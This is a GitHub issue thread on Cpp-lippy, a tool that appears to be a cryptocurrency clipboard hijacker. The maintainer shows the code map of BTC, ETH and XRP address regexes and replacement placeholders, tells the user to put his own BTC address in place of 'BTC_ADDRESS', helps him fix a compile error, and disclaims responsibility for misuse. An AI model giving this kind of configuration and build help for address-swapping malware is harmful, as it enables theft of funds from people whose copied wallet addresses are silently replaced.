### ISSUE TITLE
istructions

### ISSUE THREAD

**Issue by unfairDude** [Balzabu/Cpp-lippy#1]
cant find  where to add custom btc address in the code

**Comment by unfairDude** [comment]
fail to compile on windows

main.cpp:12:22: fatal error: filesystem: No such file or directory
 #include <filesystem>

**Comment by Balzabu** [comment]
Hello, the addresses are mapped within the code.

```
    addressDefaults = {
        {"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$", "BTC_ADDRESS"},
        {"^0x[a-fA-F0-9]{40}$", "ETH_ADDRESS"},
        {"r[0-9a-zA-Z]{24,34}$", "XRP_ADDRESS"}
    };
```

Regarding your compilation issues, please provide full logs but first try to fix your libraries.
Make sure you're compiling the project with the options I've pointed out in the readme.


**Remember that I will not be responsible for any misuse of this code, use it at your own risk.**

**Comment by unfairDude** [comment]
> Hello, the addresses are mapped within the code.
> 
> ```
>     addressDefaults = {
>         {"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$", "BTC_ADDRESS"},
>         {"^0x[a-fA-F0-9]{40}$", "ETH_ADDRESS"},
>         {"r[0-9a-zA-Z]{24,34}$", "XRP_ADDRESS"}
>     };
> ```
> 
> Regarding your compilation issues, please provide full logs but first try to fix your libraries. Make sure you're compiling the project with the options I've pointed out in the readme.
> 
> **Remember that I will not be responsible for any misuse of this code, use it at your own risk.**

you was right i was compiling with an outdated library.
regarding addresses, should i replace "BTC_ADDRESS" right?

**Comment by Balzabu** [comment]
Yes, change that value to what you want.
I'm closing this issue as Fixed, in case of any other problem feel free to open a new one.

Don't forget to leave a star on the project if you like it.
